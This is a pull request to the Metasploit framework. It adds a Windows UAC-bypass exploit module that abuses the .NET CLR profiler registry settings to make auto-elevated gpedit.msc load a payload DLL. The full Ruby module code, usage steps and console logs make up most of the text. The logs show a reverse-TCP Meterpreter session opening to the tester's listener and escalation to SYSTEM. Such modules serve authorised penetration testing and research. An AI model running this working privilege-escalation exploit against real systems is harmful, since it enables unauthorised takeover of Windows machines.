### PR TITLE
Add Windows Escalate UAC Protection Bypass (Via dot net profiler)

### DIFF
--- a/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md
@@ -1,0 +1,155 @@
+## Introduction
+
+Microsoft Windows allows for the automatic loading of a profiling COM object during
+the launch of a CLR process based on certain environment variables ostensibly to
+monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
+that will be launched as the profiling thread.  This thread will run at the permission
+level of the calling process, so an auto-elevating process will launch the DLL with
+elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
+process, but others would work, too.
+
+## Usage
+
+1. Create a session on the target system under the context of a local administrative user.
+2. Begin interacting with the module: `use exploit/windows/local/bypassuac_dotnet_profiler`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
+
+```
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] target_filepath = C:\Windows\System32\gpedit.msc
+[*] Making Payload
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
+[*] UUID = a47dbe47-41a6-42ed-95a0-e2cc4710a75a
+[*] Writing  to HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32
+[*] Writing COR_PROFILER to HKCU\Environment
+[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
+[*] Writing COR_PROFILER_PATH to HKCU\Environment
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\gpedit.msc
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.187
+[*] Meterpreter session 5 opened (192.168.135.168:4444 -> 192.168.132.187:49234) at 2019-11-15 12:14:41 -0600
+[*] Removing Registry Changes
+[*] Deleting HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32 key
+[*] Deleting COR_PROFILER from HKCU\Environment key
+[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
+[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : WIN7X64-SP1
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN7X64-SP1\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
+
+### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
+```
+msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler 
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6
+session => 6
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options
+
+Module options (exploit/windows/local/bypassuac_dotnet_profiler):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
+   SESSION       6                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] target_filepath = C:\Windows\System32\gpedit.msc
+[*] Making Payload
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
+[*] UUID = d472ba96-3dfc-432c-8ad2-f44ada2a39ec
+[*] Writing COR_PROFILER to HKCU\Environment
+[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
+[*] Writing COR_PROFILER_PATH to HKCU\Environment
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\gpedit.msc
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 7 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-11-15 12:18:54 -0600
+[*] Removing Registry Changes
+[*] Deleting COR_PROFILER from HKCU\Environment key
+[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
+[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -2,7 +2,7 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'pry'
+
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
         vprint_status("Deleting #{registry_hash[:value_name]} from #{registry_hash[:key_name]} key")
         registry_deleteval(registry_hash[:key_name], registry_hash[:value_name])
       end
-    rescue ::Exception => e
+    rescue Rex::Post::Meterpreter::RequestError => e
       print_bad("Unable to clean up registry")
       print_error(e.to_s)
     end

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -1,3 +1,8 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'pry'
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
@@ -10,7 +15,13 @@ class MetasploitModule < Msf::Exploit::Local
     super(update_info(info,
       'Name'          => 'Windows Escalate UAC Protection Bypass (Via dot net profiler)',
       'Description'   => %q(
-      TBA
+      Microsoft Windows allows for the automatic loading of a profiling COM object during
+      the launch of a CLR process based on certain environment variables ostensibly to
+      monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
+      that will be launched as the profiling thread.  This thread will run at the permission
+      level of the calling process, so an auto-elevating process will launch the DLL with
+      elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
+      process, but others would work, too.
       ),
       'License'       => MSF_LICENSE,
       'Author'        => [
@@ -32,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Local
         [
           ['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],
           ['URL', 'https://offsec.provadys.com/UAC-bypass-dotnet.html']
-ex        ],
+        ],
       'DisclosureDate' => 'Mar 17 2017'
       )
     )
@@ -63,7 +74,7 @@ ex        ],
                           registry_hash[:value_name], \
                           registry_hash[:value_value], \
                           registry_hash[:value_type])
-    rescue ::Exception => e
+    rescue Rex::Post::Meterpreter::RequestError => e
       print_error(e.to_s)
     end
   end
@@ -122,11 +133,14 @@ ex        ],
     uuid = SecureRandom.uuid
     vprint_status("UUID = #{uuid}")
     reg_keys = []
-    reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
-                  value_name: '',
-                  value_type: "REG_EXPAND_SZ ",
-                  value_value: payload_pathname,
-                  delete_on_cleanup: false)
+    # This reg key will not hurt anything in windows 10+, but is not required.
+    unless sysinfo['OS'] =~ /Windows (2016|10)/
+      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
+                    value_name: '',
+                    value_type: "REG_EXPAND_SZ",
+                    value_value: payload_pathname,
+                    delete_on_cleanup: false)
+    end
     reg_keys.push(key_name: "HKCU\\Environment",
                   value_name: "COR_PROFILER",
                   value_type: "REG_SZ",
@@ -154,7 +168,7 @@ ex        ],
     vprint_status("Launching " + target_filepath)
     begin
       session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
-    rescue ::Exception => e
+    rescue Rex::Post::Meterpreter::RequestError => e
       print_error(e.to_s)
     end
     print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -1,0 +1,196 @@
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass (Via dot net profiler)',
+      'Description'   => %q(
+      TBA
+      ),
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Casey Smith',   # UAC bypass discovery and research
+          '"Stefan Kanthak" <stefan.kanthak () nexgo de>',   # UAC bypass discovery and research
+          'bwatters-r7', # Module
+        ],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'Notes'         =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+      'References'    =>
+        [
+          ['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],
+          ['URL', 'https://offsec.provadys.com/UAC-bypass-dotnet.html']
+ex        ],
+      'DisclosureDate' => 'Mar 17 2017'
+      )
+    )
+    register_options(
+      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
+    )
+
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def write_reg_value(registry_hash)
+    vprint_status("Writing #{registry_hash[:value_name]} to #{registry_hash[:key_name]}")
+    begin
+      if not registry_key_exist?(registry_hash[:key_name])
+        registry_createkey(registry_hash[:key_name])
+        registry_hash[:delete_on_cleanup] = true
+      else
+        registry_hash[:delete_on_cleanup] = false
+      end
+      registry_setvaldata(registry_hash[:key_name], \
+                          registry_hash[:value_name], \
+                          registry_hash[:value_value], \
+                          registry_hash[:value_type])
+    rescue ::Exception => e
+      print_error(e.to_s)
+    end
+  end
+
+  def remove_reg_value(registry_hash)
+    # we may have already deleted the key
+    return unless registry_key_exist?(registry_hash[:key_name])
+    begin
+      if registry_hash[:delete_on_cleanup]
+        vprint_status("Deleting #{registry_hash[:key_name]} key")
+        registry_deletekey(registry_hash[:key_name])
+      else
+        vprint_status("Deleting #{registry_hash[:value_name]} from #{registry_hash[:key_name]} key")
+        registry_deleteval(registry_hash[:key_name], registry_hash[:value_name])
+      end
+    rescue ::Exception => e
+      print_bad("Unable to clean up registry")
+      print_error(e.to_s)
+    end
+  end
+
+  def exploit
+    check_permissions!
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    # get directory locations straight
+    win_dir = session.sys.config.getenv('windir')
+    vprint_status("win_dir = " + win_dir)
+    tmp_dir = session.sys.config.getenv('tmp')
+    vprint_status("tmp_dir = " + tmp_dir)
+    exploit_dir = win_dir + "\\System32\\"
+    vprint_status("exploit_dir = " + exploit_dir)
+    target_filepath = exploit_dir + "gpedit.msc"
+    vprint_status("target_filepath = " + target_filepath)
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'
+    payload_pathname = tmp_dir + '\\' + payload_name
+
+    # make payload
+    vprint_status("Making Payload")
+    vprint_status("payload_pathname = " + payload_pathname)
+    payload = generate_payload_dll
+
+    uuid = SecureRandom.uuid
+    vprint_status("UUID = #{uuid}")
+    reg_keys = []
+    reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
+                  value_name: '',
+                  value_type: "REG_EXPAND_SZ ",
+                  value_value: payload_pathname,
+                  delete_on_cleanup: false)
+    reg_keys.push(key_name: "HKCU\\Environment",
+                  value_name: "COR_PROFILER",
+                  value_type: "REG_SZ",
+                  value_value: "{#{uuid}}",
+                  delete_on_cleanup: false)
+    reg_keys.push(key_name: "HKCU\\Environment",
+                  value_name: "COR_ENABLE_PROFILING",
+                  value_type: "REG_SZ",
+                  value_value: "1",
+                  delete_on_cleanup: false)
+    reg_keys.push(key_name: "HKCU\\Environment",
+                  value_name: "COR_PROFILER_PATH",
+                  value_type: "REG_SZ",
+                  value_value: payload_pathname,
+                  delete_on_cleanup: false)
+    reg_keys.each do |key_hash|
+      write_reg_value(key_hash)
+    end
+
+    # Upload payload
+    vprint_status("Uploading Payload to #{payload_pathname}")
+    write_file(payload_pathname, payload)
+    vprint_status("Payload Upload Complete")
+
+    vprint_status("Launching " + target_filepath)
+    begin
+      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
+    rescue ::Exception => e
+      print_error(e.to_s)
+    end
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    # wait for a few seconds before cleaning up
+    print_status("Please wait for session and cleanup....")
+    sleep(20)
+    vprint_status("Removing Registry Changes")
+    reg_keys.each do |key_hash|
+      remove_reg_value(key_hash)
+    end
+    vprint_status("Registry Changes Removed")
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+    print_status('UAC is Enabled, checking level...')
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+end


### PR DESCRIPTION
This is another one of those auto-elevate registry key UAC bypass bugs.  It targets the .Net profiler.  Rather than launch an exe, it causes a trusted process (gpedit.msc) to load a dll.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `get a 64-bit meterpreter session`
- [x] background your session
- [x] `use windows/local/bypassuac_dotnet_profiler`
- [x] `set payload windows/x64/meterpreter/reverse_tcp`
- [x] `set lhost <lhost>`
- [x] `set lport <lport>`
- [x] `set session <session>`
- [x] `set verbose true`
- [x] `run`
- [x] `getsystem`
- [x] **Verify** you are system
- [ ] Do the w00t dance

Example
```
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] UUID = 5c710086-74fa-4cce-a3fe-af4d318eed8a
[*] Writing  to HKCU\Software\Classes\CLSID\{5c710086-74fa-4cce-a3fe-af4d318eed8a}\InprocServer32
[-] no implicit conversion of nil into Integer
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-10-30 18:05:45 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

```
